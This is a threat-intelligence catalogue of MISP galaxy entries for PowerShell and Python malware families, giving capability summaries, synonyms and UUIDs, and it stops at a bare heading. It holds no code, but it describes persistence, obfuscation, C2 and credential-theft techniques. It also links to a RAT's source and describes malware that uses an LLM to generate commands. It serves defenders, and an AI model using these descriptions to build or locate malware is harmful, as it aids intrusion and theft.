According to CERT-UA, COOKBOX is a PowerShell script that implements the functionality of downloading and executing PowerShell cmdlets. For each affected computer, a unique identifier is calculated using cryptographic transformations (SHA256/MD5 hash functions) based on a combination of computer name and disk serial number, which is transmitted in the “X-Cookie” header of HTTP requests when interacting with the management server. The persistence of the backdoor is ensured by the corresponding key in the Run branch of the operating system (OS) registry, which is created at the stage of the initial infection by a third-party PowerShell script (including the COOKBOX deployer). As a rule, obfuscation elements are used in the program code: chr-character encoding, character replacement (replace()), base64 conversion, GZIP compression.

Internal MISP references

UUID 63d51443-e4db-40b7-ba51-efc330c7a6ee which can be used as unique global reference for COOKBOX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DarkWisp

According to Trend Micro, DarkWisp is a PowerShell-based backdoor and reconnaissance utility designed for unauthorized system access and intelligence gathering. It enables attackers to exfiltrate sensitive data while maintaining persistent control over the compromised system. The malware collects extensive information about the compromised system to create a detailed profile. It determines whether the user has administrative privileges, checks for membership in a corporate domain, and identifies the presence of cryptocurrency wallets or VPN software by scanning specified directories and applications. It also gathers data about the system's operating environment, including public IP address, geographic location, installed antivirus products, firewall status, and system uptime. This information is compiled into a structured format and transmitted to the C&C server.

Internal MISP references

UUID 66f938aa-68b2-4ba4-b44b-a9dde74aca93 which can be used as unique global reference for DarkWisp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EugenLoader

A loader written in Powershell, usually delivered packaged in MSI/MSIX files.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EugenLoader.

Known Synonyms
FakeBat
NUMOZYLOD
PaykLoader
Internal MISP references

UUID cf9c14cf-6246-4858-8bcc-5a943c8df715 which can be used as unique global reference for EugenLoader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FlowerPower

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlowerPower.

Known Synonyms
BoBoStealer
Internal MISP references

UUID 6f0f034a-13f1-432d-bc70-f78d7f27f46f which can be used as unique global reference for FlowerPower in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FRat Loader

Loader used to deliver FRat (see family windows.frat)

Internal MISP references

UUID 385a3dca-263d-46be-b84d-5dc09ee466d9 which can be used as unique global reference for FRat Loader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FTCODE

The malware ftcode is a ransomware which encrypts files and changes their extension into .FTCODE. It later asks for a ransom in order to release the decryption key, mandatory to recover your files. It is infamous for attacking Italy pretending to be a notorious telecom provider asking for due payments.

Internal MISP references

UUID f727a05e-c1cd-4e95-b0bf-2a4bb64aa850 which can be used as unique global reference for FTCODE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GhostMiner

Internal MISP references

UUID 0db05333-2214-49c3-b469-927788932aaa which can be used as unique global reference for GhostMiner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GhostWeaver

According to TRAC Labs, the GhostWeaver backdoor not only maintains continuous, authenticated communication with its command-and-control server but also includes functionalities to generate DGA domains (using a fixed-seed algorithm based on the week number and year), deliver additional payloads via remote commands and bypass certificate validation by leveraging a RemoteCertificateValidationCallback that always returns true. Multiple delivered plugins are designed to target sensitive information - including credentials from popular browsers (Brave, Chrome, Firefox, Edge), Outlook data, and cryptocurrency wallets. The Formgrabber plugin includes web injection methods by dynamically manipulating HTML content, modifying JA3 fingerprints via cipher suite reordering, and employing a man-in-the-middle proxy setup to intercept the traffic. GhostWeaver’s and plugins’ delivery on systems that are not part of an Active Directory domain suggests that attackers are extending their reach beyond typical corporate targets, aligning with a financially motivated agenda that exploits environments with weaker security controls.

Internal MISP references

UUID 8a3af7b5-6039-42ac-bd14-6d6b21e0e2ae which can be used as unique global reference for GhostWeaver in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HTTP-Shell

The author describes this open source shell as follows. HTTP-Shell is Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.

This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection, movement between directories and supports sudo (or sudo su) on Linux-based OS.

Internal MISP references

UUID 50b94b67-dc2a-4953-a354-edf2cc4e17d3 which can be used as unique global reference for HTTP-Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

JasperLoader

Internal MISP references

UUID 286a14a1-7113-4bed-97ce-8db41b312a51 which can be used as unique global reference for JasperLoader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Kalambur

According to EclecticIQ, Kalambur is designed to gather local system information, then download a repackaged TOR binary inside a ZIP file and retrieve additional tools from what is likely an attacker-controlled TOR onion site.

Internal MISP references

UUID 5823aa92-75d1-4fdc-adcb-ff6a4918b226 which can be used as unique global reference for Kalambur in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Lazyscripter

Internal MISP references

UUID 74e5711e-b777-4f09-a4bc-db58d5e23e29 which can be used as unique global reference for Lazyscripter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LightBot

According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.

Internal MISP references

UUID 319c4b4f-2901-412c-8fa5-70be75ba51cb which can be used as unique global reference for LightBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Octopus (Powershell)

The author describes Octopus as an "open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S."

It is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.

Internal MISP references

UUID c3ca7a89-a885-444a-8642-31019b34b027 which can be used as unique global reference for Octopus (Powershell) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

OilRig

Internal MISP references

UUID 4a3b9669-8f91-47df-a8bf-a9876ab8edf3 which can be used as unique global reference for OilRig in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PhonyC2

Internal MISP references

UUID c630e510-a0ad-405a-9aeb-9d8057b6a868 which can be used as unique global reference for PhonyC2 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POSHSPY

Internal MISP references

UUID 4df1b257-c242-46b0-b120-591430066b6f which can be used as unique global reference for POSHSPY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerBrace

Internal MISP references

UUID 7b334343-0045-4d65-b28a-ebf912c7aafc which can be used as unique global reference for PowerBrace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerHarbor

PowerHarbor is a modular PowerShell-based malware that consists of various modules. The primary module maintains constant communication with the C2 server, executing and deleting additional modules received from it. Currently, the communication with the C2 server is encrypted using RSA encryption and hardcoded key data. Moreover, the main module incorporates virtual machine (VM) detection capabilities. The StealData module employs the Invoke-Stealer function as its core, enabling the theft of system information, browser-stored credentials, cryptocurrency wallet details, and credentials for various applications like Telegram, FileZilla, and WinSCP.

Internal MISP references

UUID 73b40a4c-9163-4a07-bf1b-e4a4344ac63a which can be used as unique global reference for PowerHarbor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerNet

According to Insikt Group, PowerNet is a custom Powershell loader that decompresses and executes NetSupport RAT.

Internal MISP references

UUID f43dee27-8484-4d4e-a981-2fa9c8a31010 which can be used as unique global reference for PowerNet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerPepper

Internal MISP references

UUID 6544c75b-809f-4d31-a235-8906d4004828 which can be used as unique global reference for PowerPepper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POWERPIPE

Internal MISP references

UUID 60d7f668-66b6-401b-976f-918470a23c3d which can be used as unique global reference for POWERPIPE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POWERPLANT

This powershell code is a PowerShell written backdoor used by FIN7. Regarding to Mandiant that is was revealed to be a "vast backdoor framework with a breadth of capabilities, depending on which modules are delivered from the C2 server."

Internal MISP references

UUID 697626d3-04a1-4426-aeae-d7054c6e78fb which can be used as unique global reference for POWERPLANT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

powershell_web_backdoor

Internal MISP references

UUID 4310dcab-0820-4bc1-8a0b-9691c20f5b49 which can be used as unique global reference for powershell_web_backdoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerShortShell

Internal MISP references

UUID f2198153-2d8b-49ed-b8a8-0952c289b8c0 which can be used as unique global reference for PowerShortShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerShower

Internal MISP references

UUID 0959a02e-6eba-43dc-bbbf-b2c7488e9371 which can be used as unique global reference for PowerShower in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POWERSOURCE

POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.

Internal MISP references

UUID a4584181-f739-43d1-ade9-8a7aa21278a0 which can be used as unique global reference for POWERSOURCE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerSpritz

Internal MISP references

UUID c07f6484-0669-44b7-90e6-f642e316d277 which can be used as unique global reference for PowerSpritz in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POWERSTAR

Internal MISP references

UUID 60e11a7b-8452-4177-b709-99ef0976c296 which can be used as unique global reference for POWERSTAR in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POWERSTATS

POWERSTATS is a backdoor written in powershell. It has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POWERSTATS.

Known Synonyms
Valyria
Internal MISP references

UUID b81d91b5-23a4-4f86-aea9-3f212169fce9 which can be used as unique global reference for POWERSTATS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POWERTON

Internal MISP references

UUID 08d5b8a4-e752-48f3-ac6d-944807146ce7 which can be used as unique global reference for POWERTON in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POWERTRASH

This PowerShell written malware is an in-memory dropper used by FIN7 to execute the included/embedded payload. According to Mandiant's blog article: "POWERTRASH is a uniquely obfuscated iteration of a shellcode invoker included in the PowerSploit framework available on GitHub."

Internal MISP references

UUID ff20d720-285e-4168-ac8c-86a7f9ac18d4 which can be used as unique global reference for POWERTRASH in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerWare

Internal MISP references

UUID 5c5beab9-614c-4c86-b369-086234ddb43c which can be used as unique global reference for PowerWare in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerZure

PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.

Internal MISP references

UUID f5fa77e9-9851-48a6-864d-e0448de062d4 which can be used as unique global reference for PowerZure in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerMagic

Internal MISP references

UUID 7ee51054-1d3b-45ec-a7fd-1e212c891b99 which can be used as unique global reference for PowerMagic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowerRAT

Internal MISP references

UUID 970bdeaf-bc34-458a-ae67-8c3578e8663d which can be used as unique global reference for PowerRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PowGoop

DLL loader that decrypts and runs a powershell-based downloader.

Internal MISP references

UUID d8429f6d-dc4b-4aae-930d-234156dbf354 which can be used as unique global reference for PowGoop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

POWRUNER

Internal MISP references

UUID 63f6df51-4de3-495a-864f-0a7e30c3b419 which can be used as unique global reference for POWRUNER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PresFox

The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.

Internal MISP references

UUID c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8 which can be used as unique global reference for PresFox in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PteroGraphin

Internal MISP references

UUID 83625464-dcb9-481d-8ced-d46c41b6d098 which can be used as unique global reference for PteroGraphin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

QUADAGENT

Internal MISP references

UUID e27bfd65-4a58-416a-b03a-1ab1703edb24 which can be used as unique global reference for QUADAGENT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RandomQuery (Powershell)

A set of powershell scripts, using services like Google Docs and Dropbox as C2.

Internal MISP references

UUID b0a67107-dff2-4fb9-a47e-10f83779bdbb which can be used as unique global reference for RandomQuery (Powershell) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RMOT

According to Trellix, this is a first-stage, powershell-based malware dropped via Excel/VBS. It is able to establish a foothold and exfiltrate data. Targets identified include hotels in Macao.

Internal MISP references

UUID 7e79444b-95d9-422d-92f0-aeb833a7cbcd which can be used as unique global reference for RMOT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RogueRobin

Internal MISP references

UUID 1e27a569-1899-4f6f-8c42-aa91bf0a539d which can be used as unique global reference for RogueRobin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Royal Ransom (Powershell)

Toolkit downloader used by Royal Ransomware group, involving GnuPG for decryption.

Internal MISP references

UUID 1c75ffff-59f9-4fdc-958d-51f822f76c35 which can be used as unique global reference for Royal Ransom (Powershell) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Schtasks

Internal MISP references

UUID 3c627182-e4ee-4db0-9263-9d657a5d7c98 which can be used as unique global reference for Schtasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SilentPrism

According to Trend Micro, SilentPrism is a backdoor malware designed to achieve persistence, dynamically execute shell commands, and maintain unauthorized remote control of compromised systems. It implements persistence mechanisms differently based on user privileges: for non-administrative users, it leverages the Windows registry to create auto-run entries using mshta.exe combined with VBScript to download and execute remote payloads; for administrative users, it deploys scheduled tasks with similar execution methods. SilentPrism retrieves additional payloads and instructions from a C&C server, ensuring modular functionality. The malware communicates with its C&C server using encrypted channels, employing AES encryption and Base64 encoding to obfuscate data. Commands received are decrypted and executed in various ways, including direct PowerShell script execution, dynamic script block creation, or job-based execution. Each task is tracked using unique identifiers, allowing the malware to monitor execution states and return results to the server. SilentPrism incorporates anti-analysis techniques such as virtual machine detection and randomized sleep intervals (ranging from 300 to 700 milliseconds) between operations, making its behavior less predictable. Additionally, it continuously polls the C&C server for commands, enabling operators to dynamically control infected systems.

Internal MISP references

UUID a4742e21-b4ad-4dc3-8207-5e6990cd33a5 which can be used as unique global reference for SilentPrism in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

skyrat

Internal MISP references

UUID 8e5d7d24-9cdd-4376-a6c7-967273dfeeab which can be used as unique global reference for skyrat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

sLoad

sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular sLoad.

Known Synonyms
Starslord
Internal MISP references

UUID e78c0259-9299-4e55-b934-17c6a3ac4bc2 which can be used as unique global reference for sLoad in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Snugy

Internal MISP references

UUID 773a6520-d164-4727-8351-c4201b04f10b which can be used as unique global reference for Snugy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

STEELHOOK

Internal MISP references

UUID f963e3df-13d1-4fd0-abdd-792c0d05e41c which can be used as unique global reference for STEELHOOK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SUBTLE-PAWS

Internal MISP references

UUID 399258d3-6919-45f9-a557-10c3cbef9bd4 which can be used as unique global reference for SUBTLE-PAWS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Swrort Stager

Internal MISP references

UUID 3347a1bc-6b4d-459c-98a5-746bab12d011 which can be used as unique global reference for Swrort Stager in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Tater PrivEsc

Internal MISP references

UUID 808445e6-f51c-4b5d-a812-78102bf60d24 which can be used as unique global reference for Tater PrivEsc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ThunderShell

Internal MISP references

UUID fd9904a6-6e06-4b50-8bfd-64ffb793d4a4 which can be used as unique global reference for ThunderShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified PS 001

Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.

Internal MISP references

UUID 77231587-0dbe-4064-97b5-d7f4a2e3dc67 which can be used as unique global reference for Unidentified PS 001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified PS 002 (RAT)

A Powershell-based RAT capable of pulling further payloads, delivered through Russia-themed phishing mails.

Internal MISP references

UUID 73578ff6-b218-4271-9bda-2a567ba3e259 which can be used as unique global reference for Unidentified PS 002 (RAT) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified PS 003 (RAT)

This malware is a RAT written in PowerShell. It has the following capabilities: Downloading and Uploading files, loading and execution of a PowerShell script, execution of a specific command. It was observed by Malwarebytes LABS Threat Intelligence Team in a newly discovered campaign: this campaigns tries to lure Germans with a promise of updates on the current threat situation in Ukraine according to Malwarebyte LABS.

Internal MISP references

UUID 709ba4ad-9ec5-4e0b-b642-96db3b7f6898 which can be used as unique global reference for Unidentified PS 003 (RAT) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified PS 004 (RAT)

Internal MISP references

UUID a8f69576-676f-4536-b301-246ddd87ceeb which can be used as unique global reference for Unidentified PS 004 (RAT) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified PS 005 (Telegram Bot)

Internal MISP references

UUID 43e09f73-5095-40dd-a10f-5bea20d9210e which can be used as unique global reference for Unidentified PS 005 (Telegram Bot) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ViperSoftX

Internal MISP references

UUID 15b551ea-b59a-40f9-a10f-6144415d2d5c which can be used as unique global reference for ViperSoftX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WannaMine

Internal MISP references

UUID beb4f2b3-85d1-491d-8ae1-f7933f00f820 which can be used as unique global reference for WannaMine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WannaRen Downloader

Internal MISP references

UUID c9ef106e-def9-4229-8373-616a298ed645 which can be used as unique global reference for WannaRen Downloader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WMImplant

Internal MISP references

UUID d1150a1a-a2f4-4954-b22a-a85b7876408e which can be used as unique global reference for WMImplant in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WRECKSTEEL

According to CERT-UA, this is a stealer targeting a range of file extensions and creating screenshots of the compromised machine to be then uploaded via cURL.

Internal MISP references

UUID 3adf4cb9-d85a-48b3-80dc-9935947676e4 which can be used as unique global reference for WRECKSTEEL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Akira Stealer

Internal MISP references

UUID 53561b34-6062-4f8b-aa47-787198ba9bff which can be used as unique global reference for Akira Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AndroxGh0st

According to Laceworks, this is a SMTP cracker, which is primarily intended to scan for and parse Laravel application secrets from exposed .env files. Note: Laravel is an open source PHP framework and the Laravel .env file is often targeted for its various configuration data including AWS, SendGrid and Twilio. AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitation of exposed creds and APIs, and even deployment of webshells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute force attacks. However, the brute force capability is likely a novelty and is a statistically unlikely attack vector.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AndroxGh0st.

Known Synonyms
Androx
AndroxGhost
Internal MISP references

UUID e8f24c9c-c03c-4740-a121-d73789931c8e which can be used as unique global reference for AndroxGh0st in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Anubis Backdoor

According to Prodaft, this is a Python-based backdoor used by the Savage Ladybug (FIN7) group is developed to provide remote access, execute commands, and steal data. It is obfuscated to avoid detection.

Internal MISP references

UUID 6bb40ba1-71a9-4f02-9bc7-94ce542ec8e5 which can be used as unique global reference for Anubis Backdoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Archivist

Internal MISP references

UUID 2095a09c-3fdd-4164-b82e-2e9a41affd8e which can be used as unique global reference for Archivist in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ares (Python)

Ares is a Python RAT.

Internal MISP references

UUID c4a578de-bebe-49bf-8af1-407857acca95 which can be used as unique global reference for Ares (Python) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BlankGrabber

Stealer written in Python 3, typically distributed bundled via PyInstaller.

Internal MISP references

UUID c41d4749-b713-4f4c-b718-4076c0479ebc which can be used as unique global reference for BlankGrabber in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Braodo

According to K7 Security Labs, Braodo Stealer is written in Python and collects all cookies and saved credentials from the browsers and all services and process information of that particular system as a zip file, which is then exfiltrated to a Telegram Channel.

Internal MISP references

UUID d39eaab7-773d-41b4-9113-cfd67971ba65 which can be used as unique global reference for Braodo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BrickerBot

Internal MISP references

UUID f0ff8751-c182-4e9c-a275-81bb03e0cdf5 which can be used as unique global reference for BrickerBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CHERRYSPY

According to CERT-UA, this is a PyArmor-protected backdoor capable of execution dynamically downloaded Python code.

Internal MISP references

UUID e219bf34-3326-4ff5-91e7-ee9008d5dee7 which can be used as unique global reference for CHERRYSPY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Creal Stealer

Creal is an open-source grabber/credential stealer that was originally made by a GitHub user named Ayhuuu, who even advertised a "premium" version on his now-deleted Telegram channel @Crealstealer. To the day of release, it was already not FUD, but its open-source nature made it attractive for threat actors to modify the base malware and even obfuscate it for less detection ratios. The base project came with a compiler, and the general source code the compiler used was PyInstaller for compilation into native formats like exe. For C2, Discord webhooks were utilized, which in later versions got protected with a service called https://stealer.to to make deletion not possible.

It Compromised following Data on Execution:

  • Discord Information
  • Browser Data
  • Crypto Related Data
  • Steam
  • Riot Games
  • Telegram
  • System Information
  • Tokens/Secrets
Internal MISP references

UUID 8a7becae-fc06-4ff1-b364-b26dd3d2edd9 which can be used as unique global reference for Creal Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DropboxC2C

Internal MISP references

UUID 53dd4a8b-374e-48b6-a7c8-58af0e31f435 which can be used as unique global reference for DropboxC2C in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Empyrean

Discord Stealer written in Python with Javascript-based inject files.

Internal MISP references

UUID b1aa0be3-b725-4135-b0b9-3a895d4ef047 which can be used as unique global reference for Empyrean in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Evil Ant

Ransomware written in Python.

Internal MISP references

UUID 24d570c6-3ed4-4346-a8b1-9fed2ed67a95 which can be used as unique global reference for Evil Ant in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Guard

According to Kaspersky Labs, Guard is a malware developed by threat actor WildPressure. It is written in Python and packaged using PyInstaller, both for Windows and macOS operating systems. Its intrinsics resemble parts of how win.milum operates.

Internal MISP references

UUID ac3382b3-3c18-4b16-8f1b-b371794916ac which can be used as unique global reference for Guard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

InvisibleFerret

Internal MISP references

UUID 332478a1-146f-406e-9af0-b329e478efff which can be used as unique global reference for InvisibleFerret in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KeyPlexer

Internal MISP references

UUID cadf8c9d-7bb0-40ad-8c8c-043b1d4b2e93 which can be used as unique global reference for KeyPlexer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LAMEHUG

According to CERT-UA, LAMEHUG uses an LLM (Qwen) to dynamically generate commands to gather basic information about a computer and recursively exfiltrate Office documents from a set of folders, to be uploaded either by SFTP or HTTP POST requests.

Internal MISP references

UUID 033d549c-2429-4837-9b3d-53871a2d8520 which can be used as unique global reference for LAMEHUG in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

LaZagne

The author described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.

Internal MISP references

UUID c752f295-7f08-4cb0-92d5-a0c562abd08c which can be used as unique global reference for LaZagne in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Lofy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lofy.

Known Synonyms
LofyLife
Internal MISP references

UUID 10882613-ac61-42da-82c8-c0f4bb2673f8 which can be used as unique global reference for Lofy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Loki RAT

This RAT written in Python is an open-source fork of the Ares RAT. This malware integrates additional modules, like recording, lockscreen, and locate options. It was used in a customized form version by El Machete APT in an ongoing champaign since 2020. The original code can be found at: https://github.com/TheGeekHT/Loki.Rat/

Internal MISP references

UUID 5e7bb9d4-6633-49f8-8770-9ac1163e6531 which can be used as unique global reference for Loki RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Luna Grabber

Internal MISP references

UUID e55b4cc8-3680-4586-82b9-4acf8cd3dc3a which can be used as unique global reference for Luna Grabber in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

MASEPIE

Internal MISP references

UUID 9233f6e6-9dd7-4b30-adaa-5baf5359d22a which can be used as unique global reference for MASEPIE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

N3Cr0m0rPh

An IRC bot written in (obfuscated) Python code. Distributed in attack campaign FreakOut, written by author Freak/Fl0urite and development potentially dating back as far as 2015.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular N3Cr0m0rPh.

Known Synonyms
FreakOut
Necro
Internal MISP references

UUID 2351539a-165a-4886-b5fe-f56fdf6b167a which can be used as unique global reference for N3Cr0m0rPh in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

NetWorm

Internal MISP references

UUID 6c6acd00-cdc2-460d-8edf-003b84875b5d which can be used as unique global reference for NetWorm in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

NightshadeC2 (Python)

According to eSentire, NightshadeC2 demonstrates an extensive capability set, including: Reverse shell via Command Prompt/PowerShell; Download and execute DLL or EXE; Self-deletion; Remote control; Screen capture; Hidden web browsers; Keylogging; clipboard content capturing. Certain variants have been found with stealing capabilities that enable the extraction of browser passwords and cookies from victim systems for both Gecko and Chromium based browsers.

Internal MISP references

UUID 10a8da24-d40d-4f1e-b173-f78e574e86aa which can be used as unique global reference for NightshadeC2 (Python) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PIRAT

Internal MISP references

UUID bca94d33-e5a1-4bcc-981e-f35fd74a79d1 which can be used as unique global reference for PIRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Poet RAT

Cisco Talos has discovered a Python-based RAT they call Poet RAT. It is dropped from a Word document and delivered including a Python interpreter and required libraries. The name originates from references to Shakespeare. Exfiltration happens through FTP.

Internal MISP references

UUID b07819a9-a2f7-454d-a520-c6424cbf1ed4 which can be used as unique global reference for Poet RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

poweRAT

Internal MISP references

UUID b5cb3d2b-0205-4883-aaff-0d0b7a7f032d which can be used as unique global reference for poweRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

pupy (Python)

Internal MISP references

UUID afcc9bfc-1227-4bb0-a88a-5accdbfd58fa which can be used as unique global reference for pupy (Python) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PXA Stealer

